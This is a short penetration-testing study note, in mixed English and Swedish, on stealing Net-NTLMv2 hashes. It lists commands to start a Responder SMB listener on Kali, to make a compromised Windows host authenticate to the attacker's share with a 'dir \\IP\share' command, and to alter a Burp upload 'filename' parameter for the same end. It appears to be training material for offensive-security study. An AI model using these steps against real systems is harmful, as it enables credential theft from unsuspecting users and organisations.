7. Net-NTLMv2 Stealing

• Another way of accessing hashes is by capturing them in the middle of an authentication to a controlled system.
• Hashes are spilled when trying to authenticate using the Net-NTLMv2 protocol instead of Kerberos, which is more secure.
• This could be done by already having RCE and accessing higher privileged hashes, or by forcing the system via some function to authenticate against our controlled machine

RCE Net-NTLMv2 Hash Steal:

1. Enumerera användaren (valfritt):

net user <user>

2. Sätt upp SMB Server med Responder i Kali:

sudo responder -I <interface>

3. Skicka en förfrågan efter en arbiträr share på SMB-servern från Windows:

dir \\192.168.X.X\test

4. Win!

File Upload Net-NTLMv2 Hash Steal:

1. Modifiera Burp Requesten för parametern 'filename' att ladda upp en arbiträr fil från Responder-SMB:n.
2. Win!